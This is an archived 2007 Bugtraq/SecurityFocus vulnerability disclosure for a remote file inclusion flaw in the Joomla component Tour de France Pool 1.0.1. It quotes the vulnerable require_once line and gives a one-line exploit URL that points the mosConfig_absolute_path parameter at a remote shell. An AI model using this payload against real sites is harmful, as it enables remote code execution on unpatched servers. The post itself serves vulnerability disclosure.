Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista
our de France Pool 1.0.1 Remote File İnclude Bug Aug 02 2007 05:58PM
yollubunlar yollubunlar org
------------Yollubunlar.Org----------------

Title : Tour de France Pool 1.0.1 Remote File İnclude Bug

Author : Yollubunlar.Org

Orginal : http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.htm
l

Mail : yollubunlar (at) hotmail (dot) com [email concealed]

Down : http://joomla.bultena.com/component/option,com_remository/Itemid,26/func
,download/id,19/chk,f9f89538d34c214c01bfc48dc276e762/lang,en/

Bug : in admin.tour_toto.php " require_once( $mosConfig_absolute_path.'/administrator/components/com_tour_toto/riders
.php'); "

Exploit : site.com/path/administrator/components/com_tour_toto/admin.tour_toto.php
?mosConfig_absolute_path=sHELL?

Greetz: Yollubunlar.Org

Not: Vatan Sagolsun ! Şehitler Ölmez , Vatan Bölünmez "

[ reply ]







 

Privacy Statement
Copyright 2007, SecurityFocus